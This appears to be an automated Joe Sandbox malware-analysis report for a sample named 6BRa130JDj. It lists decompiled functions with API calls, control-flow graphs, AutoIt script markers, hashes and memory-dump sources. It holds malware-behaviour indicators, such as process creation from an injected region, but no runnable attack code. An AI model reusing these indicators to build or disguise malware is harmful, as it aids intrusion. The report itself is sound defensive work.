                                                                                                                    control_flow_graph 1443 2b407c-2b4092 1444 2b4098-2b40ad call 2b7a16 1443->1444 1445 2b416f-2b4173 1443->1445 1448 2ed3c8-2ed3d7 LoadStringW 1444->1448 1449 2b40b3-2b40d3 call 2b7bcc 1444->1449 1452 2ed3e2-2ed3fa call 2b7b2e call 2b6fe3 1448->1452 1449->1452 1453 2b40d9-2b40dd 1449->1453 1461 2b40ed-2b416a call 2d2de0 call 2b454e call 2d2dbc Shell_NotifyIconW call 2b5904 1452->1461 1465 2ed400-2ed41e call 2b7cab call 2b6fe3 call 2b7cab 1452->1465 1455 2b40e3-2b40e8 call 2b7b2e 1453->1455 1456 2b4174-2b417d call 2b8047 1453->1456 1455->1461 1456->1461 1461->1445 1465->1461
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002ED3D7
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _memset.LIBCMT ref: 002B40FC
                                                                                                                    • _wcscpy.LIBCMT ref: 002B4150
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B4160
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                    • Opcode ID: 8a8acb037c98305a03886e5e455416303a6b772a0755525a90df54e3710cf065
                                                                                                                    • Instruction ID: 2dc2b460a9c8e2801483f3d9f51fc0ecf7e357f5c9268bd72c0a2a8bb7aeb7fa
                                                                                                                    • Opcode Fuzzy Hash: 8a8acb037c98305a03886e5e455416303a6b772a0755525a90df54e3710cf065
                                                                                                                    • Instruction Fuzzy Hash: E831E131428301AFD335FB60DC85FDA77ECAF50340F10491AF58992092DBB0A6A8CB82
                                                                                                                    Function 002D541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1478 2d541d-2d5436 1479 2d5438-2d543d 1478->1479 1480 2d5453 1478->1480 1479->1480 1482 2d543f-2d5441 1479->1482 1481 2d5455-2d545b 1480->1481 1483 2d545c-2d5461 1482->1483 1484 2d5443-2d5448 call 2d8b28 1482->1484 1485 2d546f-2d5473 1483->1485 1486 2d5463-2d546d 1483->1486 1492 2d544e call 2d8db6 1484->1492 1490 2d5475-2d5480 call 2d2de0 1485->1490 1491 2d5483-2d5485 1485->1491 1486->1485 1489 2d5493-2d54a2 1486->1489 1495 2d54a9 1489->1495 1496 2d54a4-2d54a7 1489->1496 1490->1491 1491->1484 1494 2d5487-2d5491 1491->1494 1492->1480 1494->1484 1494->1489 1497 2d54ae-2d54b3 1495->1497 1496->1497 1500 2d559c-2d559f 1497->1500 1501 2d54b9-2d54c0 1497->1501 1500->1481 1502 2d5501-2d5503 1501->1502 1503 2d54c2-2d54ca 1501->1503 1505 2d556d-2d556e call 2e0ba7 1502->1505 1506 2d5505-2d5507 1502->1506 1503->1502 1504 2d54cc 1503->1504 1507 2d55ca 1504->1507 1508 2d54d2-2d54d4 1504->1508 1517 2d5573-2d5577 1505->1517 1510 2d5509-2d5511 1506->1510 1511 2d552b-2d5536 1506->1511 1516 2d55ce-2d55d7 1507->1516 1514 2d54db-2d54e0 1508->1514 1515 2d54d6-2d54d8 1508->1515 1518 2d5521-2d5525 1510->1518 1519 2d5513-2d551f 1510->1519 1512 2d5538 1511->1512 1513 2d553a-2d553d 1511->1513 1512->1513 1520 2d553f-2d554b call 2d46e6 call 2e0e5b 1513->1520 1521 2d55a4-2d55a8 1513->1521 1514->1521 1522 2d54e6-2d54ff call 2e0cc8 1514->1522 1515->1514 1516->1481 1517->1516 1523 2d5579-2d557e 1517->1523 1524 2d5527-2d5529 1518->1524 1519->1524 1539 2d5550-2d5555 1520->1539 1525 2d55ba-2d55c5 call 2d8b28 1521->1525 1526 2d55aa-2d55b7 call 2d2de0 1521->1526 1538 2d5562-2d556b 1522->1538 1523->1521 1529 2d5580-2d5591 1523->1529 1524->1513 1525->1492 1526->1525 1530 2d5594-2d5596 1529->1530 1530->1500 1530->1501 1538->1530 1540 2d55dc-2d55e0 1539->1540 1541 2d555b-2d555e 1539->1541 1540->1516 1541->1507 1542 2d5560 1541->1542 1542->1538
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1559183368-0
                                                                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction ID: ef7e4292e3abb9495ec898da5de770ff41e44235f8b649e3b8cc37bf28da6de5
                                                                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                    • Instruction Fuzzy Hash: AF51D830A20B16DBDB258F69D88066E77A6AF40320F64872BF825963D0D7F1DDB08F41
                                                                                                                    Function 002B686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4E0F
                                                                                                                    • _free.LIBCMT ref: 002EE263
                                                                                                                    • _free.LIBCMT ref: 002EE2AA
                                                                                                                      • Part of subcall function 002B6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002B6BAD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                    • Opcode ID: 835c00c44ee77c90b015f25885cf69613e22283ee834b261a4abdd63fb41131f
                                                                                                                    • Instruction ID: 9fad2a77162eb878343a2b32ab5d6f2aa1c9dc299fed311e91db6c29b1b8c33e
                                                                                                                    • Opcode Fuzzy Hash: 835c00c44ee77c90b015f25885cf69613e22283ee834b261a4abdd63fb41131f
                                                                                                                    • Instruction Fuzzy Hash: 9A919C7192025AAFCF05EFA5C8819EDB7B8FF09350F44442AF815AB2A1DB70AD65CF50
                                                                                                                    Function 0116ACF8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0116ABE8: Sleep.KERNELBASE(000001F4), ref: 0116ABF9
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116AE38
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: KRV2PF9C8GEH0K6C8S2VX7L520
                                                                                                                    • API String ID: 2694422964-1144677494
                                                                                                                    • Opcode ID: 6556174188aace0adfe0772f65696f64c58f3e3db47d24d4402cd781efe6e34b
                                                                                                                    • Instruction ID: d2c833c36095a9c4e69d28f849f13f8dca97172770a4fe6d5dce15d6d1c59c23
                                                                                                                    • Opcode Fuzzy Hash: 6556174188aace0adfe0772f65696f64c58f3e3db47d24d4402cd781efe6e34b
                                                                                                                    • Instruction Fuzzy Hash: 3261A370D04288DBEF15DBB4D854BEEBBB8AF15304F044199E2487B2C1D7BA1B49CB66
                                                                                                                    Function 002B35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002B35A1,SwapMouseButtons,00000004,?), ref: 002B35D4
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002B35A1,SwapMouseButtons,00000004,?,?,?,?,002B2754), ref: 002B35F5
                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,002B35A1,SwapMouseButtons,00000004,?,?,?,?,002B2754), ref: 002B3617
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                    • Opcode ID: d3d484723adc5c6ce137b7e6d6d22cc01081acdf811ba0c89af85e50a6892fb4
                                                                                                                    • Instruction ID: f0d5e4fa558c64a47a95372e2b6a31db996d8bdd9e7d33acbf67787f263ca491
                                                                                                                    • Opcode Fuzzy Hash: d3d484723adc5c6ce137b7e6d6d22cc01081acdf811ba0c89af85e50a6892fb4
                                                                                                                    • Instruction Fuzzy Hash: 0D1148B5920208BFDB21CF68DC80AEEB7BCEF04780F005469E805D7210D2719E609764
                                                                                                                    Function 0031955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4EE5: _fseek.LIBCMT ref: 002B4EFD
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319824
                                                                                                                      • Part of subcall function 00319734: _wcscmp.LIBCMT ref: 00319837
                                                                                                                    • _free.LIBCMT ref: 003196A2
                                                                                                                    • _free.LIBCMT ref: 003196A9
                                                                                                                    • _free.LIBCMT ref: 00319714
                                                                                                                      • Part of subcall function 002D2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,002D9A24), ref: 002D2D69
                                                                                                                      • Part of subcall function 002D2D55: GetLastError.KERNEL32(00000000,?,002D9A24), ref: 002D2D7B
                                                                                                                    • _free.LIBCMT ref: 0031971C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1552873950-0
                                                                                                                    • Opcode ID: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                                                                    • Instruction ID: 121824b4c9348d1951f16e82c59d229563d9d814a262f44a93a273b4d16a6702
                                                                                                                    • Opcode Fuzzy Hash: 57d0d2f04a8deae04fb8388104c663c78e861137db03f429770e89b5c3a69279
                                                                                                                    • Instruction Fuzzy Hash: A5513DB1914258AFDF299F64CC81AEEBB7AEF48340F10449EB609A7341DB715A90CF58
                                                                                                                    Function 002D470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2782032738-0
                                                                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction ID: c7300264d6d95afa1bc1ead20d36b61613f3e13a1ae68ada9a3263b25cdc6360
                                                                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                    • Instruction Fuzzy Hash: C641D634A207469BEF18EF69CC809AEB7A6EF453A4B24813FE819C7740D770DD609B40
                                                                                                                    Function 002B44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B44CF
                                                                                                                      • Part of subcall function 002B407C: _memset.LIBCMT ref: 002B40FC
                                                                                                                      • Part of subcall function 002B407C: _wcscpy.LIBCMT ref: 002B4150
                                                                                                                      • Part of subcall function 002B407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002B4160
                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 002B4524
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B4533
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002ED4B9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1378193009-0
                                                                                                                    • Opcode ID: 5093fba244b659ec87228d1360fc7c99f1144d4fb72480f5b69f0c03958fa701
                                                                                                                    • Instruction ID: ab9d842af954d8bfbdf72f59448fc96fd8da29a7617d64b533265a1b2bd85f3c
                                                                                                                    • Opcode Fuzzy Hash: 5093fba244b659ec87228d1360fc7c99f1144d4fb72480f5b69f0c03958fa701
                                                                                                                    • Instruction Fuzzy Hash: 532107709547849FEB339F248885BE6BBECAF21344F44049DE6CE56182C3B42994DB51
                                                                                                                    Function 002B4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: AU3!P/4$EA06
                                                                                                                    • API String ID: 4104443479-3315824915
                                                                                                                    • Opcode ID: cf20dd99b68a744d9ab2001b4c15a6e6237f7ec83411361d14785738a683dea9
                                                                                                                    • Instruction ID: 1d4c1c82888e961e09f605195dcb2c33686322c05092db450b9b1776fec5015b
                                                                                                                    • Opcode Fuzzy Hash: cf20dd99b68a744d9ab2001b4c15a6e6237f7ec83411361d14785738a683dea9
                                                                                                                    • Instruction Fuzzy Hash: 7A416B21A2415A67CF22BF54C8E17FE7FB29B45380F684465EC829B283D6609D6487A1
                                                                                                                    Function 002B7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002EEA39
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 002EEA83
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                      • Part of subcall function 002D0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002D07B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                    • Opcode ID: fbf3cffd04f0d9795ced78af0f71da17b592c1034414ff4b2cf6f52ff67f8565
                                                                                                                    • Instruction ID: 2aa9413767a8a25dd556aa485dbcf716b9a65601c4924ecf2e45dc7964965e33
                                                                                                                    • Opcode Fuzzy Hash: fbf3cffd04f0d9795ced78af0f71da17b592c1034414ff4b2cf6f52ff67f8565
                                                                                                                    • Instruction Fuzzy Hash: 1D21C630A202889BDF019F94D845BDE7BF9AF48314F00405AE408A7341DBF45999CFA1
                                                                                                                    Function 00318D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                    • String ID: EA06
                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                    • Opcode ID: af35595357df78430ca253adad330c3666692f17705ba7488bc0b886c6bbc037
                                                                                                                    • Instruction ID: 53b28e365d5af8f2702eb89f2fb8efaef4a0394ae3564ea80d2fd6e9425431dc
                                                                                                                    • Opcode Fuzzy Hash: af35595357df78430ca253adad330c3666692f17705ba7488bc0b886c6bbc037
                                                                                                                    • Instruction Fuzzy Hash: C301F9718042187EDB19CBA8D856EEE7BFCDB15301F00419FF552D2281E9B4EA148BA0
                                                                                                                    Function 01169938 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0116997D
                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0116999C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2094043687.0000000001168000.00000040.00000020.00020000.00000000.sdmp, Offset: 01168000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1168000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CreateExit
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 126409537-2746444292
                                                                                                                    • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                    • Instruction ID: 1c7a5e370fcee567f9c61200d5952a5c587aea6fa2d6286f5cd906058487e944
                                                                                                                    • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                                                                                                    • Instruction Fuzzy Hash: 63F0ECB154024DABDB64EFE0CC49FEE777CBF44705F448908BA0A9A184DB7596188B62
                                                                                                                    Function 003198E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 003198F8
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0031990F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: 3ffc50a1c51049642a710220ab9e4248250d63e7e29368fe2e3e435e0215caa2
                                                                                                                    • Instruction ID: a97877f6e38efe8277735bcf569051a12f58f424dca6e16deb30132b56b8f1df
                                                                                                                    • Opcode Fuzzy Hash: 3ffc50a1c51049642a710220ab9e4248250d63e7e29368fe2e3e435e0215caa2
                                                                                                                    • Instruction Fuzzy Hash: 2ED05E7994030DAFDB619BA0DC4EFEBB73CE704700F4046B1BA54D20A1EAB095988B91
                                                                                                                    Function 0032CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 41d6d90cd4cb5adf509d653c003157bfbe3627cd806ea9c1483d9c23458ae538
                                                                                                                    • Instruction ID: 84b90acb734ee2f3946e00f08e564cd3472c187d993f697f97cd67da6e666284
